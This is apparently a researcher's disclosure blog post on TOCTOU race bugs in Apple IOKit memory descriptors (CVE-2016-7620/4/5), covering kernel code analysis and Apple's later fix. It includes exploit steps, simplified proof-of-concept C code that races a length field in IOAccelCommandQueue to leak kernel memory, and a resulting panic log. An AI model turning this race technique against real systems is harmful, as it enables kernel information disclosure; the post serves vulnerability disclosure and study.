Racing for everyone: descriptor describes TOCTOU in Apple’s core
This blog post is about a new type of vulnerabilities in IOKit I discovered and submitted to Apple in 2016. I did a brief scan using a IDA script on MacOS and found at least four bugs with 3 CVEs assigned (CVE-2016-7620/4/5), see https://support.apple.com/kb/HT207423. I was told afterwards that there’re even more issues of this type on iOS’/OSX’s IOKit drivers and fortunately Apple fixed them also.
Lecture time: IOKit revisited
Recall the old userspace iokit call entry method:
1709 kern_return_t
1710 IOConnectCallMethod(
1711 mach_port_t connection, // In
1712 uint32_t selector, // In
1713 const uint64_t *input, // In
1714 uint32_t inputCnt, // In
1715 const void *inputStruct, // In
1716 size_t inputStructCnt, // In
1717 uint64_t *output, // Out
1718 uint32_t *outputCnt, // In/Out
1719 void *outputStruct, // Out
1720 size_t *outputStructCntP) // In/Out
1721 {
//...
1736 if (inputStructCnt <= sizeof(io_struct_inband_t)) {
1737 inb_input = (void *) inputStruct;
1738 inb_input_size = (mach_msg_type_number_t) inputStructCnt;
1739 }
1740 else {
1741 ool_input = reinterpret_cast_mach_vm_address_t(inputStruct);
1742 ool_input_size = inputStructCnt;
1743 }
1744 //...
1770 else if (size <= sizeof(io_struct_inband_t)) {
1771 inb_output = outputStruct;
1772 inb_output_size = (mach_msg_type_number_t) size;
1773 }
1774 else {
1775 ool_output = reinterpret_cast_mach_vm_address_t(outputStruct);
1776 ool_output_size = (mach_vm_size_t) size;
1777 }
1778 }
1779
1780 rtn = io_connect_method(connection, selector,
1781 (uint64_t *) input, inputCnt,
1782 inb_input, inb_input_size,
1783 ool_input, ool_input_size,
1784 inb_output, &inb_output_size,
1785 output, outputCnt,
1786 ool_output, &ool_output_size);
1787
//...
1795 return rtn;
1796 }
If the inputstruct is larger than sizeof(io_struct_inband_t)
, the passed in argument will be casted to a mach_vm_address_t
, otherwise just a native pointer.
Is this one race-able? No? Is that one race-able?
For a curious mind one would like to ask, if there exists any possibility that this can be modified to lead to TOCOU? Historical vulnerabilities focuses on racing memories shared via IOConnectMapMemory, whose meaning is very obvious according to this name (see Pangu’s and Ian Beer‘s ) research), however these kinds of vulns are mostly eliminated now.
Eyes turned to these simple and naive IOKit arguments, are these benign little spirits even race-able?
Lets see how these arguments are passed from userspace to kernel space.
In MIG trap defs and generated code, different input types are dealt in different ways.
601
602routine io_connect_method(
603 connection : io_connect_t;
604 in selector : uint32_t;
605
606 in scalar_input : io_scalar_inband64_t;
607 in inband_input : io_struct_inband_t;
608 in ool_input : mach_vm_address_t;
609 in ool_input_size : mach_vm_size_t;
610
611 out inband_output : io_struct_inband_t, CountInOut;
612 out scalar_output : io_scalar_inband64_t, CountInOut;
613 in ool_output : mach_vm_address_t;
614 inout ool_output_size : mach_vm_size_t
615 );
616
```
```
/* Routine io_connect_method */
mig_external kern_return_t io_connect_method
(
mach_port_t connection,
uint32_t selector,
io_scalar_inband64_t scalar_input,
mach_msg_type_number_t scalar_inputCnt,
io_struct_inband_t inband_input,
mach_msg_type_number_t inband_inputCnt,
mach_vm_address_t ool_input,
mach_vm_size_t ool_input_size,
io_struct_inband_t inband_output,
mach_msg_type_number_t *inband_outputCnt,
io_scalar_inband64_t scalar_output,
mach_msg_type_number_t *scalar_outputCnt,
mach_vm_address_t ool_output,
mach_vm_size_t *ool_output_size
)
{
//...
(void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
//...
if (inband_inputCnt > 4096) {
{ return MIG_ARRAY_TOO_LARGE; }
}
(void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
//...
InP->ool_input = ool_input;
InP->ool_input_size = ool_input_size;
OK, seems scala-input and struct-input with size < 4096 are copied and bundled inband of the mach-msg, then passed into kernel space. No way.
However, Struct-input with size > 4096 remains mach_vm_address and is untouched.
Now lets dive into kernel space
3701 kern_return_t is_io_connect_method
3702 (
3703 io_connect_t connection,
3704 uint32_t selector,
3705 io_scalar_inband64_t scalar_input,
3706 mach_msg_type_number_t scalar_inputCnt,
3707 io_struct_inband_t inband_input,
3708 mach_msg_type_number_t inband_inputCnt,
3709 mach_vm_address_t ool_input,
3710 mach_vm_size_t ool_input_size,
3711 io_struct_inband_t inband_output,
3712 mach_msg_type_number_t *inband_outputCnt,
3713 io_scalar_inband64_t scalar_output,
3714 mach_msg_type_number_t *scalar_outputCnt,
3715 mach_vm_address_t ool_output,
3716 mach_vm_size_t *ool_output_size
3717 )
3718 {
3719 CHECK( IOUserClient, connection, client );
3720
3721 IOExternalMethodArguments args;
3722 IOReturn ret;
3723 IOMemoryDescriptor * inputMD = 0;
3724 IOMemoryDescriptor * outputMD = 0;
3725
//...
3736 args.scalarInput = scalar_input;
3737 args.scalarInputCount = scalar_inputCnt;
3738 args.structureInput = inband_input;
3739 args.structureInputSize = inband_inputCnt;
3740
3741 if (ool_input)
3742 inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
3743 kIODirectionOut, current_task());
3744
3745 args.structureInputDescriptor = inputMD;
//...
3753 if (ool_output && ool_output_size)
3754 {
3755 outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
3756 kIODirectionIn, current_task());
//...
3774 return (ret);
3775 }
Seems Apple and Linus take a different approach here. In Linux kernel, usually incoming userspace content are copied to kernel-allocated memory content using copy_from_user
. However here the Apple kernel directly creates a memory descriptor using the userspace address, rather than creating a copy.
So can we modify this memory content in userspace after it’s passed to kernel via IOKit call?
Surprisingly, the answer is yes!
This means, for a IOKit call, if the corresponding IOService accepts input memory descriptor, the userspace program can alter the content while the IOService is processing it, no lock, no write prevention. Juicy place for racing conditions and TOCTOUs(Time to check before time to use) 🙂 After this bug is fixed I talked to security folks at Apple and they said even they didn’t realized the descriptor mapped memory is writable by userspace.
I quickly identified several potential vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface, one of them (CVE-2016-7624) is described below. And there’re far more patterns than that, using your imagination 🙂
TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox
There exists an TOCTOU in IOCommandQueue::submit_command_buffer. This function accepts either inband struct or structureInputDescriptor. Data controlled by attacker is passed into the function and at certain offset a value is used as length. The length is validated but due to the nature of MemoryDescriptor, client can still change the value when its actually used by modifying the mapped memory, causing TOCTOU that lead to information disclosure or other possible oob write.
Analysis
IOAccelCommandQueue::s_submit_command_buffers accept user input IOExternalMethodArguments, and if structureInputDescriptor is passed in from a userspace mapped address, it will use structureInputDescriptor and get a IOMemoryMap then get its address and use it. But nothing prevents userspace from modifying the content represented by the address, lead to TOCTOU.
__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
{
IOExternalMethodArguments *v3; // r12@1
IOAccelCommandQueue *v4; // r15@1
unsigned __int64 inputdatalen; // rsi@1
unsigned int v6; // ebx@1
IOMemoryDescriptor *v7; // rdi@3
__int64 v8; // r14@3
__int64 inputdata; // rcx@5
v3 = a3;
v4 = this;
inputdatalen = (unsigned int)a3->structureInputSize;
v6 = -536870206;
if ( inputdatalen >= 8
&& inputdatalen - 8 == 3
* (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
{
v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
v8 = 0LL;
if ( v7 )
{
v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
v6 = -536870200;
if ( !v8 )
return v6;
inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
LODWORD(inputdatalen) = v3->structureInputSize;
}
We can see that at offset+4, a DWORD is retrived as length and compared with ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen – 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)
And then this length
offset is used again in submit_command_buffer. See the following code:
if ( *((_QWORD *)this + 160) )
{
v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
if ( v5 )
{
IOAccelShared2::processResourceDirtyCommands(v5);
IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
if ( *(_DWORD *)(input + 4) )
{
v6 = (unsigned __int64 *)(input + 24);
v7 = 0LL;
do
{
IOAccelCommandQueue::submitCommandBuffer(
(IOAccelCommandQueue *)v2,
*((_DWORD *)v6 - 4),//v6 based on input
*((_DWORD *)v6 - 3),//based on input
*(v6 - 1),//based on input
*v6);//based on input
++v7;
v6 += 3;
}
while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
}
Notice in line 23 that *(input+4) is accessed again as loop boundary. However if user passes in a descriptor, then he can modify it at userland and bypass the check in s_submit_command_buffers
, cause the loop to go out-of-bound.
In IOAccelCommandQueue::submitCommandBuffer
, in the following statement:
IOGraphicsAccelerator2::sendBlockFenceNotification(
*((IOGraphicsAccelerator2 **)this + 166),
(unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
data_from_input_add_24_minus_8,
0LL,
v13);
result = IOGraphicsAccelerator2::sendBlockFenceNotification(
*((IOGraphicsAccelerator2 **)this + 166),
(unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
data_from_input_add_24,
0LL,
v13);
The memory content is sent back to user space if a notification callback is installed. So if an attacker can carefully control some sensitive memory to place after the mapped descriptor memory, the OOB can get this content back to userspace, lead to infoleak.
The exploit steps are
- Userspace program mmaps memory page, pass it as iokit call argument structureInputDescriptor
- s_submit_command_buffer validates at +4 the content is legal compared to the total incoming structureInput length
- submit_command_buffer iterates the passed in descriptor memory from userspace, using the +4 as boundary length indicator. Memory content readed is calculated in submitCommandBuffer and send back to userspace via installed asyncNotificationPort.
- Userspace program races to modify this +4 offset value, causing the loop to go out-of-bound, leaking adjacent memory in Kernel address space.
Notice that the inputdatelen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API. Because in this API, structureInput and structureInputDescriptor cannot be passed at same time.
Instead we directly call _io_connect_method private function in IOKit framework, which accepts structureInput and structureInputDescriptor at same time.
POC code
POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version:
volatile unsigned int secs = 10;
void modifystrcut()
{
*((unsigned int*)(input+4)) = 0x7fffffff;
printf("secs %x\n", secs);
}
//...
int main(int argc, const char * argv[]) {
io_iterator_t iterator;
//...
getFunc();
io_connect_t conn;
io_service_t svc;
//...
IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
svc = IOIteratorNext(iterator);
printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
//...
io_connect_t sharedconn;
IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
IOConnectAddClient(conn, sharedconn);
//then set async ref
ref = IONotificationPortCreate(kIOMasterPortDefault);
port = IONotificationPortGetMachPort(ref);
pthread_t rt;
pthread_create(&rt, NULL, gaorunloop, NULL);
io_async_ref64_t asyncRef;
asyncRef[kIOAsyncCalloutFuncIndex] = callback;
asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
//...
const uint32_t outputcnt = 0;
const size_t outputcnt64 = 0;
IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
//...
size_t i=0;
input = dommap();
{
char* structinput = input;
*((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
size_t outcnt = 0;
}
//...
const size_t bufsize = 4088;
char buf[bufsize];
memset(buf, 'a', sizeof(buf)*bufsize);
size_t outcnt =0;
*((unsigned int*)(buf+4)) = 0xaa;
//...
{
pthread_t t;
pthread_create(&t, NULL, modifystrcut, NULL);
//...
io_connect_method(
conn,
1,
NULL,//input
0,//inputCnt
buf,//inb_input
bufsize,//inb_input_size
reinterpret_cast_mach_vm_address_t(input),//ool_input
ool_size,//ool_input_size
buf,//inb_output
(mach_msg_type_number_t*)&outputcnt, //inb_output_size*
(uint64_t*)buf,//output
&outputcnt, //outputCnt
reinterpret_cast_mach_vm_address_t(buf), //ool_output
(mach_msg_type_number_t*)&outputcnt64//ool_output_size*
);
}
Two key constans are 4088 and 0xaa, this two numbers will comfort the check at
inputdatalen - 8 == 3
* (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
and
if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL
* (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen
- 8) >> 64) >> 4) )
Panic Report
panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
R8: 0x00000000ffffffff, R9: 0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS: 0x0000000000000008, SS: 0x0000000000000010
Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0
Backtrace (CPU 0), Frame : Return Address
0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
Kernel Extensions in backtrace:
com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000
BSD process name corresponding to current thread: cmdqueue1
Boot args: keepsyms=1 -v
Mac OS version:
15F34
Kernel version:
Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
Kernel slide: 0x000000001dc00000
Kernel text base: 0xffffff801de00000
__HIB text base: 0xffffff801dd00000
System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)
Disassembling the RIP register
__text:000000000002929E mov esi, [rbx-10h] ; unsigned int
__text:00000000000292A1 mov edx, [rbx-0Ch] ; unsigned int
__text:00000000000292A4 mov rcx, [rbx-8] ; unsigned __int64
__text:00000000000292A8 mov r8, [rbx] ; unsigned __int64
We can see at the crash address, rbx has already go out-of-bound, hits an adjacent unmapped area, lead to crash.
Tested on 10.11.5 Macbook Airs, Macbook Pros with command line
while true; do ./cmdqueue1 ; done
Fix for these issues
The sources for XNU in 10.11.2 haven’t been released, but let’s have a look at disassembled kernel.
Originally, we have these lines when creating a descriptor:
3741 if (ool_input)
3742 inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
3743 kIODirectionOut, current_task());
Proved by dissembling unmatched kernel:
mov rax, gs:8
mov rcx, [rax+308h] ; unsigned int
mov edx, 2 ; unsigned __int64
mov rsi, [rbp+arg_8] ; unsigned __int64
call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov r15, rax
While on the 10.11.2, the corresponding snippet in _is_io_connect_method changed to:
mov rax, gs:8
mov rcx, [rax+318h] ; unsigned int
mov edx, 20002h ; unsigned __int64
mov rsi, [rbp+arg_8] ; unsigned __int64
call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
mov r15, rax
A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange. The flag Apple has fixed these type of vulns by setting these descriptors to MAP_MEM_VM_COPY, preventing userspace from modifying it in 10.12.2 and iOS 10.2. Will it solve these issues once and for all?
Credits
Credit also goes to Liang Chen of KeenLab for also contributing to this research.